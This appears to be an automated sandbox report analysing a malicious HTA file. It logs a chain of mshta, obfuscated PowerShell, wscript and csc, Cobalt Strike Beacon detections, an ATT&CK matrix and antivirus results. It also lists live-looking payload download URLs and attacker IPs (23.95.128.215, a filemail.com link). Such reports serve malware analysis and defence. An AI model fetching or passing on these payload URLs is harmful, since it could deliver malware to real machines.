          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts12
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts4
          PowerShell          		Logon Script (Windows)Logon Script (Windows)11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564308 Sample: greatthingetniretimewithgoo... Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 46 ip.3105.filemail.com 2->46 48 3105.filemail.com 2->48 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Antivirus detection for URL or domain 2->66 68 15 other signatures 2->68 10 mshta.exe 1 2->10         started        signatures3 process4 signatures5 70 Detected Cobalt Strike Beacon 10->70 72 Suspicious powershell command line found 10->72 74 PowerShell case anomaly found 10->74 13 powershell.exe 3 39 10->13         started        process6 dnsIp7 50 23.95.128.215, 49730, 80 AS-COLOCROSSINGUS United States 13->50 40 seethepossiblethin...imetogivemebest.vBs, Unicode 13->40 dropped 42 C:\Users\user\AppData\...\w0uathue.cmdline, Unicode 13->42 dropped 82 Detected Cobalt Strike Beacon 13->82 84 Suspicious powershell command line found 13->84 86 Obfuscated command line found 13->86 88 Found suspicious powershell code related to unpacking or dynamic code loading 13->88 18 wscript.exe 1 13->18         started        21 powershell.exe 21 13->21         started        23 csc.exe 3 13->23         started        26 conhost.exe 13->26         started        file8 signatures9 process10 file11 52 Detected Cobalt Strike Beacon 18->52 54 Suspicious powershell command line found 18->54 56 Wscript starts Powershell (via cmd or directly) 18->56 60 3 other signatures 18->60 28 powershell.exe 7 18->28         started        58 Loading BitLocker PowerShell Module 21->58 38 C:\Users\user\AppData\Local\...\w0uathue.dll, PE32 23->38 dropped 31 cvtres.exe 1 23->31         started        signatures12 process13 signatures14 76 Detected Cobalt Strike Beacon 28->76 78 Suspicious powershell command line found 28->78 80 Obfuscated command line found 28->80 33 powershell.exe 15 15 28->33         started        36 conhost.exe 28->36         started        process15 dnsIp16 44 ip.3105.filemail.com 193.30.119.205, 443, 49731 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 33->44

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta21%ReversingLabsScript-WScript.Trojan.Asthma
          greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta29%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ip.3105.filemail.com0%Avira URL Cloudsafe
          http://3105.filemail.com0%Avira URL Cloudsafe
          http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb;0%Avira URL Cloudsafe
          https://go.microsoft.cH0%Avira URL Cloudsafe
          https://3105.file0%Avira URL Cloudsafe
          http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPb0%Avira URL Cloudsafe
          http://23.95.128.215/226/seethep0%Avira URL Cloudsafe
          https://go.microsoft.cH0%VirustotalBrowse
          http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF100%Avira URL Cloudmalware
          http://3105.filemail.com0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ip.3105.filemail.com
          		193.30.119.205
          		truefalse
            		high
            3105.filemail.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFtrue
              • Avira URL Cloud: malware
              		unknown
              https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7cfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://3105.filemail.compowershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ip.3105.filemail.compowershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://3105.filepowershell.exe, 00000009.00000002.1816997416.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://go.micropowershell.exe, 00000001.00000002.1811106062.00000000050B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb;powershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://go.microsoft.cHpowershell.exe, 00000007.00000002.1856532641.0000000007270000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://go.microspowershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://23.95.128.215/226/seetheppowershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.mpowershell.exe, 00000009.00000002.1841164664.0000000007BAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.micropowershell.exe, 00000001.00000002.1828783287.00000000080F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPbpowershell.exe, 00000001.00000002.1819843824.000000000726C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1811106062.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1699204987.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1848545841.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820142065.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://3105.filemail.compowershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      193.30.119.205
                                                      		ip.3105.filemail.comunknown
                                                      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                      23.95.128.215
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1564308
                                                      Start date and time:2024-11-28 07:17:06 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 4m 40s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
                                                      Detection:MAL
                                                      Classification:mal100.phis.expl.evad.winHTA@17/19@1/2
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 34
                                                      • Number of non-executed functions: 11
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .hta
                                                      • Stop behavior analysis, all processes terminated

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target mshta.exe, PID 6848 because there are no executed function
                                                      • Execution Graph export aborted for target powershell.exe, PID 2336 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 2492 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6248 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7064 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      01:17:58API Interceptor90x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      193.30.119.205Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                        26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                          List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            Inquiry.jsGet hashmaliciousUnknownBrowse
                                                              Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                  sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                    thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                          23.95.128.215Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF
